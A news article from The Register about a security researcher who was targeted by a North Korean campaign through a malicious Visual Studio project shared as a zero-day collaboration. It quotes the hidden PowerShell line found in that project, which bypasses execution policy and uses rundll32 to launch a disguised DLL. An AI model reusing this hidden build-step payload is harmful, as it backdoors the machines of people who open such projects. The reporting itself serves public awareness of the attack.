This article is more than 1 year old

I was targeted by North Korean 0-day hackers using a Visual Studio project, vuln hunter tells El Reg

Hyperion Gray founder relates 'holy f**k' moment when he realised

A zero-day hunter has told The Register of the “holy f**k” moment when he realised he'd been targeted by a North Korean campaign aimed at stealing Western researchers' vulns.

Alejandro Caceres said he "thought it was insane" that he had been targeted by state-backed malicious people operating as part of a campaign revealed last night by Google’s Threat Analysis Group (TAG).

"When I read the Google thing I honestly think I said out loud 'holy fuck', I thought it was insane. Attacked by a nation state? Me!?" Caceres, co-founder of the Hyperion Gray security research company, told El Reg.

Enraged by the deception, Caceres also offered a hefty bounty for information leading to the arrest of "James Willy", who appears to be one of the North Korean actors engaged on the Pyongyang-driven campaign.

Google's TAG said last night it had uncovered "an ongoing campaign targeting security researchers working on vulnerability research and development." It attributed these attacks to "a government-backed entity based in North Korea." As we reported, the country was targeting infosec professionals through a variety of methods, including Twitter, LinkedIn and Telegram – but there was a little more to it in Caceres' case.

A vulnerability broker he had known for a while and trusted had introduced him to a new researcher called James Willy "from New York," Caceres told El Reg, explaining: "We hopped in a group chat, the three of us, and he sent me a Visual Studio project to take a look at a driver bug that caused a blue screen of death."

Vuln brokers are (occasionally shady) people who buy and sell methods of exploiting vulnerabilities in software products. Normally they're most interested in so-called zero-days: previously unknown vulnerabilities that have existed since "day zero" of a program’s lifespan, as Reg readers know. These are obviously valuable to criminals, nation states and legitimate security pros alike.

As for the BSOD, "James" told Caceres and the vuln broker that it was linked to Google Chrome – an instant attention-grabber for bug hunters. Vulns affecting software used by tens of millions worldwide are rare and command hefty rewards.

Speculate to accumulate

When he opened the Visual Studio project from "James", Caceres admitted he had been a little careless but shrugged off the risk. After all, this was somebody who had been vouched for – and the zero-day was genuine.

"The code was all legit, it was a real crash with potential security implications, but I wasn't careful when I opened the Visual Studio project," he sighed. "Since this guy was semi-known I thought nothing of it. And I was able to confirm the 0-day vulnerability, the code compiled just fine, I understood what it was doing (attacking a graphics driver) and all was good, or so I thought."

Opening some Visual Studio projects can cause code to execute, which was the North Koreans' attack vector.

exploit tweets

A Google portmanteau of Twitter accounts used in the North Korean campaign. "James Willy" is at top right

An arrangement to write up and credit "James" for his research fell through and Caceres put the episode out of his mind. Until, four or five days later, his broker friend "told me he got wind of the guy trying to backdoor someone else's machine with a Visual Studio phishing trick." Sure enough, Caceres found the smoking gun buried in the VS project sent to him by "James":

powershell -executionpolicy bypass -windowstyle hidden  if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\http://Browse.VC.db)){rundll32 x64\Debug\http://Browse.VC.db,ENGINE_get_RAND 6bt7cJNGEb3Bx9yK 2907}

"My thought was that if this was not legit they'd use some trash code," Caceres told The Register. "But the 0-day was very real, if still rudimentary, so it made me comfortable that the guy really just needed help with it."

Caceres speculated that the North Korean wanted access to his machine so he could hunt for other vulns to steal and exploit, in a form of speculating to accumulate. Burning low-impact zero-days to potentially gain high-impact zero-days from a dedicated researcher seems, if nothing else, credible.

Last year the US-CERT warned that North Korean hackers were targeting wealthy Western companies for protection money, and it might be the case that the zero-day theft operation which targeted Caceres and others is linked to that tactic.

Sometimes – just sometimes – those evil nation state hackers really are coming after you. Being an ordinary bughunting pro doesn't make you less of a target. ®

More about

TIP US OFF

Send us news


Other stories you might like